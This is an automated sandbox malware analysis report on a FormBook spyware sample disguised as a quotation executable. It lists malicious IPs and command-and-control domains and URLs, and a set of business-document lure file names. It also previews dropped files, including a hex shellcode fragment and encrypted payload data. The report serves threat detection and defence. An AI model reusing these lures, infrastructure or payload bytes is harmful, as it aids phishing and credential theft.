https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://v-cn.vaptcha.com/v3.js	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hm.baidu.com/hm.js?	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hsck520.com	KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4090192746.00000000050BB000.00000040.80000000.00040000.00000000.sdmp	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.livechat.com/chat-with/14282961/	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.livechat.com/?welcome	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.webuyfontana.com	United States	16509	AMAZON-02US	true
35.190.52.58	www.hsck520.com	United States	15169	GOOGLEUS	false
203.161.55.102	www.lexiecos.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
165.154.0.120	7a4ca695fd164z.greycdn.net	Canada	7456	INTERHOPCA	true
147.92.36.231	aj.ajunsdfancsda.com	Hong Kong	59371	DNC-ASDimensionNetworkCommunicationLimitedHK	true
38.47.232.224	ytw6.top	United States	174	COGENT-174US	true
116.213.43.190	www.binpvae.lol	Hong Kong	63889	CLOUDIVLIMITED-ASCloudIvLimitedHK	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467924
Start date and time:	2024-07-05 03:21:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PTT Group project - Quotation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@13/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 57 Number of non-executed functions: 269
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
21:22:43	API Interceptor	11965299x Sleep call for process: RMActivate_ssp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	80TeZdsbeA6B6j4.exe	Get hash	malicious	FormBook	Browse	www.realtors.biz/mc10/?ejn=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/XlvHoWwQQ/&vVjLC=M6Ah
	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	www.webuyfontana.com/cns4/
	disjR92Xrrnc3aZ.exe	Get hash	malicious	FormBook	Browse	www.realtors.biz/mc10/?FPWhWLW=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/bcjmEWnWMuFtbCmA==&AlB=8pdT8tsp
	order_details_file.doc	Get hash	malicious	Unknown	Browse	themaiergroup.com/8C4ebB7oC
	2024 Lusail Fence-WITH STICKER-2-003.exe	Get hash	malicious	FormBook	Browse	www.scarytube.world/ts59/?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L
	scan19062024.exe	Get hash	malicious	FormBook	Browse	www.oreh.net/even/
	Shipping Documents.exe	Get hash	malicious	FormBook	Browse	www.ansverity.com/7llb/
	Shipping Documents.exe	Get hash	malicious	FormBook	Browse	www.ansverity.com/7llb/
	Shipping Documents.pdf.exe	Get hash	malicious	FormBook	Browse	www.cetys.com/dxp3/
	3gQmWdKNmxvFltF.exe	Get hash	malicious	FormBook	Browse	www.neorubik.com/wfa4/
203.161.55.102	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	www.lexiecos.top/ff8d/
	GJRX21GBj3.exe	Get hash	malicious	FormBook	Browse	www.lacemalt.top/tb8p/
	Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe	Get hash	malicious	FormBook	Browse	www.lexiecos.top/ff8d/
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	www.lexiecos.top/ff8d/
	Request for Quotation - (SM Store San Mateo).exe	Get hash	malicious	FormBook	Browse	www.lexiecos.top/ff8d/
	PTT request form.exe	Get hash	malicious	FormBook	Browse	www.bodfun.online/wbp0/
	Request for Quotation - e092876.exe	Get hash	malicious	FormBook	Browse	www.lexiecos.top/ff8d/
	PTT requested quotation.exe	Get hash	malicious	FormBook	Browse	www.bodfun.online/wbp0/
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	www.lexiecos.top/ff8d/
	PO Number 00127011.exe	Get hash	malicious	FormBook	Browse	www.timelesszone.xyz/bf2r/
165.154.0.120	HSBCscancopy-invoice778483-payment87476MT103.exe	Get hash	malicious	FormBook	Browse	www.778981.com/i74x/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.augaqfp.lol	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Request for Quotation - (SM Store San Mateo).exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	PO Number 00127011.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Quotation - TB046J12LCO2 Project Mechanical.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Sapura Engineering Sdn Bhd-RFQ.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	RFQ - 49780284109.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	ITHi-Tech Park Project.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
www.binpvae.lol	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Request for Quotation - (SM Store San Mateo).exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Quotation - TB046J12LCO2 Project Mechanical.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Sapura Engineering Sdn Bhd-RFQ.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	RFQ - 49780284109.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	ITHi-Tech Park Project.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	RFQ - ITHi-Tech Park Project.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
aj.ajunsdfancsda.com	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	207.148.37.252
	Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe	Get hash	malicious	FormBook	Browse	45.126.181.243
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	147.92.36.232
	Request for Quotation - (SM Store San Mateo).exe	Get hash	malicious	FormBook	Browse	147.92.38.243
	PTT request form.exe	Get hash	malicious	FormBook	Browse	45.126.181.243
	PTT requested quotation.exe	Get hash	malicious	FormBook	Browse	118.107.56.40
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	45.126.181.243
	Quotation - TB046J12LCO2 Project Mechanical.exe	Get hash	malicious	FormBook	Browse	147.92.38.243
	D02984-KP-002011.exe	Get hash	malicious	FormBook	Browse	147.92.36.232
	Sapura Engineering Sdn Bhd-RFQ.exe	Get hash	malicious	FormBook	Browse	147.92.36.232
www.lexiecos.top	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	Request for Quotation - (SM Store San Mateo).exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	Quotation - TB046J12LCO2 Project Mechanical.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	Sapura Engineering Sdn Bhd-RFQ.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	RFQ - 49780284109.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	ITHi-Tech Park Project.exe	Get hash	malicious	FormBook	Browse	203.161.55.102
	RFQ - ITHi-Tech Park Project.exe	Get hash	malicious	FormBook	Browse	203.161.55.102

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERHOPCA	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	HSBCscancopy-invoice778483-payment87476MT103.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	Request for Quotation - (SM Store San Mateo).exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	Request for Quotation - e092876.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	Quotation - TB046J12LCO2 Project Mechanical.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	Sapura Engineering Sdn Bhd-RFQ.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	RFQ - 49780284109.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
AMAZON-02US	https://singingfiles.com/show.php?l=0&u=2156442&id=64574	Get hash	malicious	Unknown	Browse	18.239.50.108
	https://metamesklogni.webflow.io/	Get hash	malicious	Unknown	Browse	52.222.232.144
	https://rules-pear-kft5d2.mystrikingly.com/	Get hash	malicious	Unknown	Browse	143.204.176.115
	https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1	Get hash	malicious	Unknown	Browse	13.227.219.3
	http://review-page-violation-issue-meta-center.vercel.app/	Get hash	malicious	Unknown	Browse	76.76.21.98
	http://cacahs.fdavm.com/	Get hash	malicious	Unknown	Browse	13.227.219.3
	http://mysterymint-s10.vercel.app/	Get hash	malicious	Unknown	Browse	76.76.21.98
	https://swans-muffin-1id4964-7304421.netlify.app/form	Get hash	malicious	Unknown	Browse	52.208.243.88
	https://metaioseklcogin.webflow.io/	Get hash	malicious	Unknown	Browse	52.222.232.99
	https://pub-fb608504b57048a1b1ca54c74dbf132d.r2.dev/ront.html?ccsend	Get hash	malicious	HTMLPhisher	Browse	18.239.36.8
DNC-ASDimensionNetworkCommunicationLimitedHK	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	207.148.37.252
	Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe	Get hash	malicious	FormBook	Browse	45.126.181.243
	mQY9ka5sW6hv2Ri.exe	Get hash	malicious	FormBook	Browse	147.92.43.172
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	147.92.36.232
	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	147.92.43.172
	Request for Quotation - (SM Store San Mateo).exe	Get hash	malicious	FormBook	Browse	147.92.38.243
	PTT request form.exe	Get hash	malicious	FormBook	Browse	45.126.181.243
	wxa7qH57Zr.elf	Get hash	malicious	Mirai	Browse	66.233.205.141
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	45.126.181.243
	Shipping Documents.exe	Get hash	malicious	FormBook	Browse	103.195.51.41
VNPT-AS-VNVNPTCorpVN	adobe_scanner12.exe	Get hash	malicious	FormBook	Browse	203.161.41.205
	XeKVjhBWhU.elf	Get hash	malicious	Unknown	Browse	14.250.22.77
	Nf3OIrzQO4.exe	Get hash	malicious	FormBook	Browse	203.161.55.124
	0tkRwEewXq.exe	Get hash	malicious	FormBook	Browse	203.161.55.124
	qS7rA9kvqg.elf	Get hash	malicious	Unknown	Browse	14.168.156.7
	EGQr0VDazQ.elf	Get hash	malicious	Unknown	Browse	14.246.113.27
	2HFh2OjMG7.elf	Get hash	malicious	Unknown	Browse	113.178.195.61
	eW8ah5TCen.elf	Get hash	malicious	Unknown	Browse	113.191.27.91
	5QQrnIBRTm.elf	Get hash	malicious	Mirai	Browse	113.191.76.23
	VXBKak29Dz.elf	Get hash	malicious	Mirai	Browse	113.173.233.165
COGENT-174US	adobe_scanner12.exe	Get hash	malicious	FormBook	Browse	38.47.232.185
	ScanPDF_102.exe	Get hash	malicious	FormBook	Browse	38.55.194.30
	https://nmg.evlink21.net/	Get hash	malicious	Unknown	Browse	154.59.122.79
	205.185.124.50-arm-2024-07-03T23_47_53.elf	Get hash	malicious	Mirai, Moobot	Browse	154.39.121.31
	205.185.124.50-x86-2024-07-03T23_47_55.elf	Get hash	malicious	Mirai, Moobot	Browse	154.42.40.250
	CMgd5ZVG2N.elf	Get hash	malicious	Unknown	Browse	38.245.242.130
	qS7rA9kvqg.elf	Get hash	malicious	Unknown	Browse	160.238.102.21
	PMcyGpR57k.elf	Get hash	malicious	Unknown	Browse	38.210.131.180
	buPdHWwrzF.elf	Get hash	malicious	Unknown	Browse	38.14.1.248
	Z2X8cP8r7S.elf	Get hash	malicious	Unknown	Browse	149.51.230.83

Process:	C:\Windows\SysWOW64\RMActivate_ssp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autC8E0.tmp

Download File

Process:	C:\Users\user\Desktop\PTT Group project - Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.992546164758959
Encrypted:	true
SSDEEP:	6144:RN+7bNnd4i7hodlFf3L08/3nkS1lZOgk9nCcvzSGZ:R8JdlhWlFfl/3T1jOZnCVo
MD5:	924DAE418BAF2140D43F7289FF6A4CDE
SHA1:	46ADB2C13C56E254FCBB78219261D3F976BDF24F
SHA-256:	18437C85F7610E7FA7E5651776ED0F628B545A930D467473CE6D73F0D0357FC5
SHA-512:	D982472A901E9B1CA60CAF3E27BBF260273ADCCFCD9CB122560F5A7129BE753F83188A380AF6C22DF77B21652120D497D5B3EFBF0DD5E1DFE21DBC672AC232B2
Malicious:	false
Reputation:	low
Preview:	..w..9V4Q..L....2:...`RJ...DD2O29V4QHQBEFODD2O29V4QHQBEFO.D2O<&.:Q.X.d.N....ZP%.!:>%7'"d'S!\V".3-q00(o-..}jvY>,4lHKE`D2O29V4(IX.x&(.yR(..6S.R..\|/#.(..jT6.K..s$#..[Z>.1/.BEFODD2Ob\|V4.IPB4&q.D2O29V4Q.Q@DMNOD2_69V4QHQBEF.WD2O"9V4qLQBE.ODT2O2;V4WHQBEFODB2O29V4QHqFEFMDD2O29T4..QBUFOTD2O2)V4AHQBEFOTD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBk2<02O2.Y0QHABEF_@D2_29V4QHQBEFODD2o2964QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QH

C:\Users\user\AppData\Local\Temp\autC92F.tmp

Download File

Process:	C:\Users\user\Desktop\PTT Group project - Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	9846
Entropy (8bit):	7.608555311952128
Encrypted:	false
SSDEEP:	192:ZyaFcKrLMynw1R9GCkEWAsd0Zv3ORpcAMh5vkdtRMnrYLrPkBm:3F7rwynwdGCgdMejcvvsdX8rYXPf
MD5:	4A924244E61D3D9BC8A274E3EE7DFB84
SHA1:	8FF17EC9A0F5053EF3946A1AF32D622CF23B5A6E
SHA-256:	4D5469AB24FAEC6962F499E4BF091197FB80E32FD09E2FE3100925443041B700
SHA-512:	75CA4A7CAAB1C99D711A2B000FFCE65C8B6BBA6975F616D0A33E5898F5043241F469188CB8F6565E7BE3156918382B0F6FB19A6F4AF6E97E416352D730178F2F
Malicious:	false
Reputation:	low
Preview:	EA06..pT..f.Y..4.Lf.9..D.P..I..3..h3j..s9..g3...g3..4:..E..&.i..8......D.Ph3...aB.Q..j5.q4.Pf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...\|.I..W.d...\|vI..W.d...\|vK..W.d...\|vK(.W.e...\|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&

C:\Users\user\AppData\Local\Temp\savager

Download File

Process:	C:\Users\user\Desktop\PTT Group project - Quotation.exe
File Type:	ASCII text, with very long lines (28756), with no line terminators
Category:	dropped
Size (bytes):	28756
Entropy (8bit):	3.5964080474172366
Encrypted:	false
SSDEEP:	768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+Iw6lr4vfF3if6gyTu:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rv
MD5:	3CBB608C0BCE2E2035F58FF9083A8546
SHA1:	595EF13F495762AE6A132B12CB76F2E75EB34B3D
SHA-256:	6B4E90C9CE1A812B2B950833DEDF6438D1243B99F0DEB92AD163562CA57B163A
SHA-512:	257A1DD8BB7D4AE0F501D2C2152B5A40EE333349EEEF28DCA399BECD96314AD3DD46C71D94F1D7EBDA8E617BF24A6E68B90B0FE76653421CFB442AE46A9EF640
Malicious:	false
Reputation:	low
Preview:	1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

C:\Users\user\AppData\Local\Temp\ultraradicalism

Download File

Process:	C:\Users\user\Desktop\PTT Group project - Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.992546164758959
Encrypted:	true
SSDEEP:	6144:RN+7bNnd4i7hodlFf3L08/3nkS1lZOgk9nCcvzSGZ:R8JdlhWlFfl/3T1jOZnCVo
MD5:	924DAE418BAF2140D43F7289FF6A4CDE
SHA1:	46ADB2C13C56E254FCBB78219261D3F976BDF24F
SHA-256:	18437C85F7610E7FA7E5651776ED0F628B545A930D467473CE6D73F0D0357FC5
SHA-512:	D982472A901E9B1CA60CAF3E27BBF260273ADCCFCD9CB122560F5A7129BE753F83188A380AF6C22DF77B21652120D497D5B3EFBF0DD5E1DFE21DBC672AC232B2
Malicious:	false
Reputation:	low
Preview:	..w..9V4Q..L....2:...`RJ...DD2O29V4QHQBEFODD2O29V4QHQBEFO.D2O<&.:Q.X.d.N....ZP%.!:>%7'"d'S!\V".3-q00(o-..}jvY>,4lHKE`D2O29V4(IX.x&(.yR(..6S.R..\|/#.(..jT6.K..s$#..[Z>.1/.BEFODD2Ob\|V4.IPB4&q.D2O29V4Q.Q@DMNOD2_69V4QHQBEF.WD2O"9V4qLQBE.ODT2O2;V4WHQBEFODB2O29V4QHqFEFMDD2O29T4..QBUFOTD2O2)V4AHQBEFOTD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBk2<02O2.Y0QHABEF_@D2_29V4QHQBEFODD2o2964QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QHQBEFODD2O29V4QH

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.126809611526652
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PTT Group project - Quotation.exe
File size:	1'176'576 bytes
MD5:	0ffee94b9fb3a74d3f1ad3774edc51ed
SHA1:	0fe3355e5e7a1543c42a1c66fd9285b2b0529af0
SHA256:	c413b461e4df7628f4ccdaa98233ec18a3d6808265dc38f631902ef58f502c88
SHA512:	0f28ca9ddc2ca8d6bcbddfe9db4df9ef4b6eec83b1941afaeef0e5de4e114debd7a9c7cde6d00d4a85f1ac0ffa9c269e6a8709d6fc58f91134e670df077d6e11
SSDEEP:	24576:mAHnh+eWsN3skA4RV1Hom2KXMmHapq3CukTLUC9k9RSFz8tj6V5:Bh+ZkldoPK8YapRuO59sjw
TLSH:	DA45BE0273D1D036FFABA2739B6AF6415ABC79254123852F13981D79BC701B2263E763
